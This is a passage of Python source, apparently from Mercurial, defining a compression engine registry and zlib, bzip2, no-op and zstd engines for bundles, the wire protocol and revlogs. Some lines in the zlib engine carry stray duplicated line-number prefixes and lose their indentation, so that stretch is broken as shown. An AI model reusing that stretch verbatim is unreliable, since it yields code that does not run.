            # stable.
            w = e.wireprotosupport()
            return -1 * getattr(w, attr), w.name

        return list(sorted(engines, key=getkey))

    def forwiretype(self, wiretype):
        engine = self._engines[self._wiretypes[wiretype]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forrevlogheader(self, header):
        """Obtain a compression engine registered to a revlog header.

        Will raise KeyError if the revlog header value isn't registered.
        """
        return self._engines[self._revlogheaders[header]]

compengines = compressormanager()

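# Example lookups against the global instance (a sketch, assuming the zlib
# engine registered below):
#
#   engine = compengines.forbundletype('GZ')
#   compressed = ''.join(engine.compressstream(iter(['some data'])))
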
class compressionengine(object):
    """Base class for compression engines.

    Compression engines must implement the interface defined by this class.
    """
    def name(self):
        """Returns the name of the compression engine.

        This is the key the engine is registered under.

        This method must be implemented.
        """
        raise NotImplementedError()

    def available(self):
        """Whether the compression engine is available.

        The intent of this method is to allow optional compression engines
        that may not be available in all installations (such as engines relying
        on C extensions that may not be present).
        """
        return True

    def bundletype(self):
        """Describes bundle identifiers for this engine.

        If this compression engine isn't supported for bundles, returns None.

        If this engine can be used for bundles, returns a 2-tuple of strings of
        the user-facing "bundle spec" compression name and an internal
        identifier used to denote the compression format within bundles. To
        exclude the name from external usage, set the first element to ``None``.

        If bundle compression is supported, the class must also implement
        ``compressstream`` and ``decompressorreader``.

        The docstring of this method is used in the help system to tell users
        about this engine.
        """
        return None

    def wireprotosupport(self):
        """Declare support for this compression format on the wire protocol.

        If this compression engine isn't supported for compressing wire
        protocol payloads, returns None.

        Otherwise, returns ``compenginewireprotosupport`` with the following
        fields:

        * String format identifier
        * Integer priority for the server
        * Integer priority for the client

        The integer priorities are used to order the advertisement of format
        support by server and client. The highest integer is advertised
        first. Integers with non-positive values aren't advertised.

        The priority values are somewhat arbitrary and only used for default
        ordering. The relative order can be changed via config options.

        If wire protocol compression is supported, the class must also implement
        ``compressstream`` and ``decompressorreader``.
        """
        return None

    def revlogheader(self):
        """Header added to revlog chunks that identifies this engine.

        If this engine can be used to compress revlogs, this method should
        return the bytes used to identify chunks compressed with this engine.
        Else, the method should return ``None`` to indicate it does not
        participate in revlog compression.
        """
        return None

    def compressstream(self, it, opts=None):
        """Compress an iterator of chunks.

        The method receives an iterator (ideally a generator) of chunks of
        bytes to be compressed. It returns an iterator (ideally a generator)
        of chunks of bytes representing the compressed output.

        Optionally accepts an argument defining how to perform compression.
        Each engine treats this argument differently.
        """
        raise NotImplementedError()

    def decompressorreader(self, fh):
        """Perform decompression on a file object.

        Argument is an object with a ``read(size)`` method that returns
        compressed data. Return value is an object with a ``read(size)``
        method that returns uncompressed data.
        """
        raise NotImplementedError()

    def revlogcompressor(self, opts=None):
        """Obtain an object that can be used to compress revlog entries.

        The object has a ``compress(data)`` method that compresses binary
        data. This method returns compressed binary data or ``None`` if
        the data could not be compressed (too small, not compressible, etc).
        The returned data should have a header uniquely identifying this
        compression format so decompression can be routed to this engine.
        This header should be identified by the ``revlogheader()`` return
        value.

        The object has a ``decompress(data)`` method that decompresses
        data. The method will only be called if ``data`` begins with
        ``revlogheader()``. The method should return the raw, uncompressed
        data or raise a ``RevlogError``.

        The object is reusable but is not thread safe.
        """
        raise NotImplementedError()

class _zlibengine(compressionengine):
    def name(self):
        return 'zlib'

    def bundletype(self):
        """zlib compression using the DEFLATE algorithm.

        All Mercurial clients should support this format. The compression
        algorithm strikes a reasonable balance between compression ratio
        and speed.
3425 3425 """
3426 3426 return 'gzip', 'GZ'
3427 3427
3428 3428 def wireprotosupport(self):
3429 3429 return compewireprotosupport('zlib', 20, 20)
3430 3430
3431 3431 def revlogheader(self):
3432 3432 return 'x'
3433 3433
3434 3434 def compressstream(self, it, opts=None):
3435 3435 opts = opts or {}
3436 3436
3437 3437 z = zlib.compressobj(opts.get('level', -1))
3438 3438 for chunk in it:
3439 3439 data = z.compress(chunk)
            # Not all calls to compress emit data. It is cheaper to inspect
            # here than to feed empty chunks through the generator.
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        def gen():
            d = zlib.decompressobj()
            for chunk in filechunkiter(fh):
                while chunk:
                    # Limit output size to limit memory.
                    yield d.decompress(chunk, 2 ** 18)
                    chunk = d.unconsumed_tail

        return chunkbuffer(gen())

    class zlibrevlogcompressor(object):
        def compress(self, data):
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            if insize < 44:
                return None

            elif insize <= 1000000:
                compressed = zlib.compress(data)
                if len(compressed) < insize:
                    return compressed
                return None

            # zlib makes an internal copy of the input buffer, doubling
            # memory usage for large inputs. So do streaming compression
            # on large inputs.
            else:
                z = zlib.compressobj()
                parts = []
                pos = 0
                while pos < insize:
                    pos2 = pos + 2**20
                    parts.append(z.compress(data[pos:pos2]))
                    pos = pos2
                parts.append(z.flush())

                if sum(map(len, parts)) < insize:
                    return ''.join(parts)
                return None

        def decompress(self, data):
            try:
                return zlib.decompress(data)
            except zlib.error as e:
                raise error.RevlogError(_('revlog decompress error: %s') %
                                        str(e))

    def revlogcompressor(self, opts=None):
        return self.zlibrevlogcompressor()

compengines.register(_zlibengine())

class _bz2engine(compressionengine):
    def name(self):
        return 'bz2'

    def bundletype(self):
        """An algorithm that produces smaller bundles than ``gzip``.

        All Mercurial clients should support this format.

        This engine will likely produce smaller bundles than ``gzip`` but
        will be significantly slower, both during compression and
        decompression.

        If available, the ``zstd`` engine can yield similar or better
        compression at much higher speeds.
        """
        return 'bzip2', 'BZ'

    # We declare a protocol name but don't advertise by default because
    # it is slow.
    def wireprotosupport(self):
        return compewireprotosupport('bzip2', 0, 0)

    def compressstream(self, it, opts=None):
        opts = opts or {}
        z = bz2.BZ2Compressor(opts.get('level', 9))
        for chunk in it:
            data = z.compress(chunk)
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        def gen():
            d = bz2.BZ2Decompressor()
            for chunk in filechunkiter(fh):
                yield d.decompress(chunk)

        return chunkbuffer(gen())

compengines.register(_bz2engine())

class _truncatedbz2engine(compressionengine):
    def name(self):
        return 'bz2truncated'

    def bundletype(self):
        return None, '_truncatedBZ'

    # We don't implement compressstream because it is hackily handled elsewhere.

    def decompressorreader(self, fh):
        def gen():
            # The input stream doesn't have the 'BZ' header. So add it back.
            d = bz2.BZ2Decompressor()
            d.decompress('BZ')
            for chunk in filechunkiter(fh):
                yield d.decompress(chunk)

        return chunkbuffer(gen())

compengines.register(_truncatedbz2engine())

class _noopengine(compressionengine):
    def name(self):
        return 'none'

    def bundletype(self):
        """No compression is performed.

        Use this compression engine to explicitly disable compression.
        """
        return 'none', 'UN'

    # Clients always support uncompressed payloads. Servers don't advertise
    # it by default because, unless you are on a fast network, uncompressed
    # payloads can easily saturate the network pipe.
    def wireprotosupport(self):
        return compewireprotosupport('none', 0, 10)

    # We don't implement revlogheader because it is handled specially
    # in the revlog class.

    def compressstream(self, it, opts=None):
        return it

    def decompressorreader(self, fh):
        return fh

    class nooprevlogcompressor(object):
        def compress(self, data):
            return None

    def revlogcompressor(self, opts=None):
        return self.nooprevlogcompressor()

compengines.register(_noopengine())

class _zstdengine(compressionengine):
    def name(self):
        return 'zstd'

    @propertycache
    def _module(self):
        # Not all installs have the zstd module available. So defer importing
        # until first access.
        try:
            from . import zstd
            # Force delayed import.
            zstd.__version__
            return zstd
        except ImportError:
            return None

    def available(self):
        return bool(self._module)

    def bundletype(self):
        """A modern compression algorithm that is fast and highly flexible.

        Only supported by Mercurial 4.1 and newer clients.

        With the default settings, zstd compression is both faster and yields
        better compression than ``gzip``. It also frequently yields better
        compression than ``bzip2`` while operating at much higher speeds.

        If this engine is available and backwards compatibility is not a
        concern, it is likely the best available engine.
        """
        return 'zstd', 'ZS'

    def wireprotosupport(self):
        return compewireprotosupport('zstd', 50, 50)

    def revlogheader(self):
        return '\x28'

    def compressstream(self, it, opts=None):
        opts = opts or {}
        # zstd level 3 is almost always significantly faster than zlib
        # while providing no worse compression. It strikes a good balance
        # between speed and compression.
        level = opts.get('level', 3)

        zstd = self._module
        z = zstd.ZstdCompressor(level=level).compressobj()
        for chunk in it:
            data = z.compress(chunk)
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        zstd = self._module
        dctx = zstd.ZstdDecompressor()
        return chunkbuffer(dctx.read_from(fh))

    class zstdrevlogcompressor(object):
        def __init__(self, zstd, level=3):
            # Writing the content size adds a few bytes to the output. However,
            # it allows decompression to be more optimal since we can
            # pre-allocate a buffer to hold the result.
            self._cctx = zstd.ZstdCompressor(level=level,
                                             write_content_size=True)
            self._dctx = zstd.ZstdDecompressor()
            self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
            self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE

        def compress(self, data):
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            if insize < 50:
                return None

            elif insize <= 1000000:
                compressed = self._cctx.compress(data)
                if len(compressed) < insize:
                    return compressed
                return None
            else:
                z = self._cctx.compressobj()
                chunks = []
                pos = 0
                while pos < insize:
                    pos2 = pos + self._compinsize
                    chunk = z.compress(data[pos:pos2])
                    if chunk:
                        chunks.append(chunk)
                    pos = pos2
                chunks.append(z.flush())

                if sum(map(len, chunks)) < insize:
                    return ''.join(chunks)
                return None

        def decompress(self, data):
            insize = len(data)

            try:
                # This was measured to be faster than other streaming
                # decompressors.
                dobj = self._dctx.decompressobj()
                chunks = []
                pos = 0
                while pos < insize:
                    pos2 = pos + self._decompinsize
                    chunk = dobj.decompress(data[pos:pos2])
                    if chunk:
                        chunks.append(chunk)
                    pos = pos2
                # Frame should be exhausted, so no finish() API.

                return ''.join(chunks)
            except Exception as e:
                raise error.RevlogError(_('revlog decompress error: %s') %
                                        str(e))

    def revlogcompressor(self, opts=None):
        opts = opts or {}
        return self.zstdrevlogcompressor(self._module,
                                         level=opts.get('level', 3))

compengines.register(_zstdengine())

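# Sketch of revlog-style use (assumes the optional zstd module is present):
#
#   compressor = compengines['zstd'].revlogcompressor()
#   data = compressor.compress('x' * 4096)  # None if not worth compressing
#
# Compressed output starts with revlogheader() ('\x28' here), which is how
# decompression gets routed back to this engine.
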
def bundlecompressiontopics():
    """Obtains a list of available bundle compressions for use in help."""
    # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
    items = {}

    # We need to format the docstring. So use a dummy object/type to hold it
    # rather than mutating the original.
    class docobject(object):
        pass

    for name in compengines:
        engine = compengines[name]

        if not engine.available():
            continue

        bt = engine.bundletype()
        if not bt or not bt[0]:
            continue

        doc = pycompat.sysstr('``%s``\n    %s') % (
            bt[0], engine.bundletype.__doc__)

        value = docobject()
        value.__doc__ = doc
        value._origdoc = engine.bundletype.__doc__
        value._origfunc = engine.bundletype

        items[bt[0]] = value

    return items

# convenient shortcut
dst = debugstacktrace